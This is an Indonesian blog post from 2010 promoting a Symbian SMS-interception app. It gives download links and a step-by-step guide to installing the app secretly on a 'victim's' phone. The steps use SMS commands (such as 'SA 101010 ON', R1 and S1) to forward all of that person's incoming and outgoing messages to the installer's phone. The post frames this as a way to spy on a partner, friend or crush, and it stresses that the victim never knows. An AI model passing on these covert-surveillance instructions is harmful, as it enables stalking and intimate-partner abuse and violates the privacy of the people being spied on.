Senin, 15 Maret 2010

SADAP SMS SI DIA

Pada jaman sekarang ini ponsel bukan lagi barang mewah ataupun barang asing buat kita orang Indonesia walaupun ia berasal dari kalangan bawah sekalipun.Kita juga sudah tau bahwa perkembangan teknologi komunikasi di tanah air suadah sangat berkembang pesat.Sekarang user bisa dengan mudah memilih ponsel sesuai dengan kebutuhannya.Bahkan dengan segala fungsinya.

Banyak orang mengatakan cukup pakai ponsel biasa-bisa saja ,pungsinya sama aja toh kegunaannya cuman buat nelepon dan Sms doang.itu tidak benar buat anda yang suka berburu aplikasi terbaru.bukankah begitu...?

Pada umumnya semua orang selalu mendambakan ponsel yang full fitur sebagai contoh disaat anda lagi bete anda bisa mendengarkan music pasti da anda merasa rileks dan santai, ataupun yang sekarang lagi ngetren bukak-buka Facebook,siapa tau si dia lagi online.coba kalau anda cuma punya ponsel low end.anda cuma bisa gigit jari menambah ke betean anda.

Perangkat ponsel anda bisajuga anda jejalin aplikasi yang anda sukai,sebab aplikasi bawaan ponsel pasti tidak akan mencukupi buat anda.

Di sini ada aplikasi bagus yang cocok anda masukkan pada ponsel anda.namanya Smsany-wherelite.sis.Fungsi dari aplikasi ini adalah buat menyadap sms orang lain.Jadi aplikasi ini sangan berguna untuk anda buat memata-matai si dia,teman ataupu untuk mengetahui kegemaran/hobby gebetan baru anda.asiknya sikorban tidak mengetahui kalau ponselnya telah di pasang aplikasi penyadap sms oleh anda.Untuk mendapatkan aplikasi ini silakan anda ikuti langkah-langkah berikut ini :

  1. Syarat ponsel anda dan korban menggunakan OS symbian.

  2. Download aplikasi penyadap sms df http://7c3e65c9.linkbucks.com/?lurl=http%3...2_0_v_1_4_1.SIS atau http://www.ziddu.com/download/3233238/smsa..._0.sis.zip.html

  3. Instal aplikasi ini di ponsel anda dan korban

  4. Setelah ter instal,akan muncul menu,seluruh pengoperasiannya harus lewat sms,mulai dari pengaktipan dan mematikan program,mengubah password,hingga pengiriman sms ke ponsel lain.Karena aplikasi symbian ini belum mendukung GUI )Graphics User Interface).

  5. Siapkan ponsel korban dan ponsel yang akan menerima sms masuk dari korban anda.

  6. Aktifkan aplikasi ini di ponsel korban dengan mengetik format sms SA(spasi) (password) (spasi) ON.Panjang password maksimal 8 karakter.Contohnya,jika password anda 101010,ketikkan SA 101010 ON kirim sms kenomor ponsel anda.

  7. Untuk menonaktifkannya,ketik SA 101010 OFF ke nomor yang sama.

  8. Selanjutnya,jika anda ingin menyadaplebih dari 5 hari atau setiap sms masuk di ponsel korban akan selalu di teruskan ke ponsel anda,ketik sms di ponsel korban anda: SA(spasi) (password) (spasi) R1,contoh SA 101010 R1.

  9. Untuk menonaktifkan fungsi ini ganti parameter di belakang "R" menjadi nol.menjadi SA 101010 R0.

  10. Sedangkan meneruskan setiap sms keluar,kirim sms bertuliskan SA 101010 S1 ke nomor anda.

  11. Menonaktifkan fungsi ini dengan mengirim sms SA 101010 S0.

  12. Tertarik menggunakannya?Selamat mencoba.

Wassalam...

Tidak ada komentar:

Posting Komentar